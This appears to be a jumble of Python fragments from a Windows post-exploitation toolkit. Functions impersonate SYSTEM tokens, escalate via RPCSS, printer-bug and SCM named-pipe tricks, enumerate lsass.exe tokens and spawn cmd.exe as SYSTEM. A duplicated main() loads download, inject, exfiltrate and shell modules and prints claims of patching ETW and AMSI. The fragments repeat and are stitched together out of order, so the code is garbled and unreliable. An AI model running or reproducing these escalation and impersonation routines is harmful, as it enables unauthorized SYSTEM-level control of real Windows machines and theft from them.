def printalltokensbyname(args):
printT(
"All tokens which are accessible from current thread by account name:")
imp = Impersonate()
imp.printTokensAccessibleByAccountNameAndPID(
targetPID=args['pid'],
oneMaxByPid=args['oneMaxByPid'],
_useThreadMethod=args['_useThreadMethod'])
def printsystemtokens(args):
printT(
"All nt authority\\system tokens which are accessible from current thread:"
)
imp = Impersonate()
imp.printSystemTokensAccessible(
targetPID=args['pid'],
oneMaxByPid=args['oneMaxByPid'],
impersonationPossibleOnly=args['impPossibleOnly'],
printFull=args['printFull'])
def cangetadmin(args):
'''
'''
printT("Current thread is be able to get administrator access:")
imp = Impersonate()
status = imp.canGetAdminAccess()
if status == True:
printG("Yes. Current thread is be able to get administrator access")
else:
printB("No. Current thread is NOT able to get administrator access")
def scm(args):
if args["toSystem"] == True:
printT("Try to spawn a system shell via scm & impersonation...")
esc = Escalation()
imp = Impersonate()
status = esc.namedPipeImpersonationSystemViaSCM(ps=True, debug=False)
imp.printCurrentThreadEffectiveToken()
if status == True:
imp = Impersonate()
imp.executeCMDWithThreadEffectiveToken()
def main():
global _username, _domain, _classes, prevId
init()
print(Fore.WHITE + Style.BRIGHT + printBanner(), end='')
with open(baseWritePath + prevId, 'r') as f:
first = json.load(f)
nextId = ''.join(
random.choice(string.ascii_uppercase + string.digits)
for _ in range(10))
first['NextId'] = nextId
with open(baseWritePath + prevId, 'w') as f:
json.dump(first, f)
prevId = nextId
content = waitAndReadFile(baseReadPath + prevId)
print("[+] Connection successfully established!")
time.sleep(3)
print("[+] Patching ETW...")
time.sleep(7)
print("[+] Manually loading kernel32.dll to avoid API hooks.")
time.sleep(7)
print("[+] Manually loading advapi32.dll to avoid API hooks.")
time.sleep(5)
print("[+] Patching AMSI...")
time.sleep(5)
print("[+] H4ck th3 Pl4n3t!")
userAndDomain = content['Output']
userAndDomain = userAndDomain.split("\\")
_domain = userAndDomain[0]
_username = userAndDomain[1]
_classes.append(Download())
_classes.append(Base64encode())
_classes.append(Base64decode())
_classes.append(Compile())
_classes.append(Inject())
_classes.append(Powershell())
_classes.append(Send())
_classes.append(Impersonate())
_classes.append(Exfiltrate())
_classes.append(Runas())
_classes.append(Shell())
mainConsole()
deinit()
def rpcss(args):
printT("Trying to exploit 'RPCSS'...")
printT("It can take many seconds, so wait...")
esc = Escalation()
status = esc.namedPipeImpersonationSystemViaRPCSS()
if status == True:
imp = Impersonate()
imp.enableAllUserRights()
imp.executeCMDWithThreadEffectiveToken()
else:
logging.error("Impossible to exploit 'RPCSS'")
def main():
global _username,_domain,_classes, prevId
init()
print(Fore.WHITE + Style.BRIGHT + printBanner() , end='')
with open(baseWritePath + prevId, 'r') as f:
first = json.load(f)
nextId = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
first['NextId'] = nextId
with open(baseWritePath + prevId, 'w') as f:
json.dump(first, f)
prevId = nextId
content = waitAndReadFile(baseReadPath + prevId)
userAndDomain = content['Output']
userAndDomain = userAndDomain.split("\\")
_domain = userAndDomain[0]
_username = userAndDomain[1]
_classes.append(Download())
_classes.append(Execute())
_classes.append(Move())
_classes.append(Base64encode())
_classes.append(Base64decode())
_classes.append(Compile())
_classes.append(Inject())
_classes.append(Downexec())
_classes.append(Powershell())
_classes.append(Send())
_classes.append(Impersonate())
_classes.append(Exfiltrate())
_classes.append(Runas())
_classes.append(Shell())
mainConsole()
deinit()
def searchimpfirstsystem(args):
'''
Impersonate the first system token which is available and prompt a cmd.exe.
:param args:
:return: True if success, otherwise false
'''
printT("Searching and impersonating first nt authority\\system token...")
imp = Impersonate()
status = imp.searchAndImpersonateFirstSystemToken(targetPID=args['pid'],
printAllTokens=False)
if status == True:
imp.enableAllUserRights()
imp.executeCMDWithThreadEffectiveToken()
printT("cmd.exe prompt started as system")
return True
else:
logging.error("Impossible to prompt a cmd.exe as system.")
return False
def impuser(args):
if args['username'] == None or args['password'] == None:
logging.error("username or password has to be given")
else:
printT("Try to impersonate via creds...")
imp = Impersonate()
status = imp.impersonateViaCreds(
login=args['username'],
password=args['password'],
domain=args['domain'],
logonType=LOGON32_LOGON_INTERACTIVE,
logonProvider=LOGON32_PROVIDER_DEFAULT)
if status == True:
printT("Impersonation success, try to spawn a shell...")
printT(
"SE_INCREASE_QUOTA_NAME and SE_ASSIGNPRIMARYTOKEN_NAME should be required"
)
imp.printCurrentThreadEffectiveToken(printFull=True,
printLinked=False)
imp.executeCMDWithThreadEffectiveToken()
else:
logging.error("Impossible to impersonate via creds")
def namedPipeImpersonationSystemViaRPCSS(self):
"""
Impersonate SYSTEM account thanks to Network Service and named pipe via RPCSS
https://decoder.cloud/2020/05/04/from-network-service-to-system/
:return: True or False (if an error)
"""
logging.debug(
"Starting named pipe impersonation via RPCSS & Network Service...")
status = self.__namedPipeImpersonation(
functionMethod=self.__createSimpleNamedPipeConnection,
pipeName=None,
ps=False)
imp = Impersonate()
allTokens = imp.getAllTokensAccessible(targetPID=None)
#imp.printTokensAccessibleByAccountNameAndPID()
status = imp.impersonateFirstSystemToken(allTokens)
imp.closeAllHandles(allTokens)
return status
def printalltokens(args):
'''
'''
printT("All tokens which are accessible from current thread:")
if 'currentpidonly' in args and args['currentpidonly'] == True:
args['pid'] = GetCurrentProcessId()
imp = Impersonate()
if args['filter'] == '':
imp.printAllTokensAccessible(targetPID=args['pid'],
printFull=args['printFull'],
printLinked=args['printLinked'],
_useThreadMethod=args['_useThreadMethod'])
else:
filter = json.loads(args['filter'])
imp.printTokensAccessibleFilter(
targetPID=args['pid'],
filter=filter,
printFull=args['printFull'],
printLinked=args['printLinked'],
_useThreadMethod=args['_useThreadMethod'])
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() imp = Impersonate() print("Print current effective token for current thread:") imp.printCurrentThreadEffectiveToken(printFull=True, printLinked=True)
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation from impersonate import Impersonate esc = Escalation() esc.namedPipeImpersonationSystemViaPrinterBug() imp = Impersonate() imp.enableAllUserRights() #Not necessary but we can do it, we do it imp.executeCMDWithThreadEffectiveToken()
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() imp = Impersonate() imp.printTokensAccessibleByAccountNameAndPID(targetPID=None, oneMaxByPid=False, _useThreadMethod=False)
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() imp = Impersonate() imp.searchAndImpersonateFirstSystemToken(targetPID=None, printAllTokens=False)
def imptoken(args):
if args['pid'] == None:
logging.error("A pid has to be selected")
else:
if args['ihandle'] == None:
printT("Impersonating primary token of pid {0}".format(
args['pid']))
else:
printT("Impersonating token of the thread ihandle {0} of pid {1}".
format(args['ihandle'], args['pid']))
imp = Impersonate()
imp.enableAllUserRights()
status = imp.impersonateThisToken(pid=args['pid'],
iHandle=args['ihandle'])
if status == True:
printT("Trying to open a cmd shell...")
printT(
"NOTICE: If not enough privileges for targeted pid, you can't open a cmd.exe shell"
)
imp.printCurrentThreadEffectiveToken()
imp.enableAllUserRights()
imp.executeCMDWithThreadEffectiveToken()
else:
logging.error("Impossible to impersonate")
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation from impersonate import Impersonate import subprocess import time esc = Escalation() esc.namedPipeImpersonationSystemViaRPCSS() imp = Impersonate() imp.enableAllUserRights() #required, othwerwise not enough privileges imp.executeWithThreadEffectiveToken(appName=sys.argv[1])
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * from windef import TokenImpersonation configureLogging() imp = Impersonate() #Get all 'impersonation' tokens wich can be impersonated and which are 'system' allTokens = imp.getTokensAccessibleFilter(targetPID=None, filter={ 'canimpersonate': True, 'sid': 'S-1-5-18', 'type': TokenImpersonation }, _useThreadMethod=False) if allTokens == {} or allTokens == None: print("No one token found for impersonation") else: #use the first token of the first pid returned in 'allTokens' pid = list(allTokens.keys())[0] firstIHandle = allTokens[pid][0]['ihandle'] imp.printThisToken(allTokens, pid, firstIHandle) imp.impersonateThisToken(pid=pid, iHandle=firstIHandle) print("Current Effective token for current thread after impersonation:") imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False) imp.terminateImpersonation() print(
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() imp = Impersonate() print( "Print limited information about all 'nt authority\system' tokens accessible and which can be impersonated:" ) imp.printSystemTokensAccessible(targetPID=None, oneMaxByPid=False, impersonationPossibleOnly=True, printFull=False)
def printalltokensbypid(args):
printT("All tokens which are accessible from current thread by PID:")
imp = Impersonate()
imp.printTokensAccessibleByPID(targetPID=args['pid'],
impPossibleOnly=args['impPossibleOnly'],
_useThreadMethod=args['_useThreadMethod'])
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() imp = Impersonate() print("Is current user can have administration access", imp.canGetAdminAccess())
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() imp = Impersonate() print( "Print limited information about all 'nt authority\system' tokens accessible:" ) imp.printTokensAccessibleFilter(targetPID=None, filter={ 'intlvl': 'System', 'sid': 'S-1-5-18' }, printFull=False, printLinked=False, _useThreadMethod=False)
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() imp = Impersonate() print("Print limited information about all tokens which can be impersonated:") imp.printTokensAccessibleFilter(targetPID=None, filter={'canimpersonate':True,}, printFull=False, printLinked=False, _useThreadMethod=False)
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() imp = Impersonate() imp.impersonateViaCreds(login='******', password='******', domain="theDOMAIN", logonType=LOGON32_LOGON_INTERACTIVE, logonProvider=LOGON32_PROVIDER_DEFAULT) imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False) imp.terminateImpersonation()
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() pid = getPIDfromName('lsass.exe') imp = Impersonate() imp.printAllTokensAccessible(targetPID=pid, printFull=False, printLinked=False, _useThreadMethod=False)
import sys
sys.path.append('../')
from impersonate import Impersonate
from utils import *
configureLogging()
imp = Impersonate()
imp.printAllTokensAccessibleWithRecursiveImpersonation()
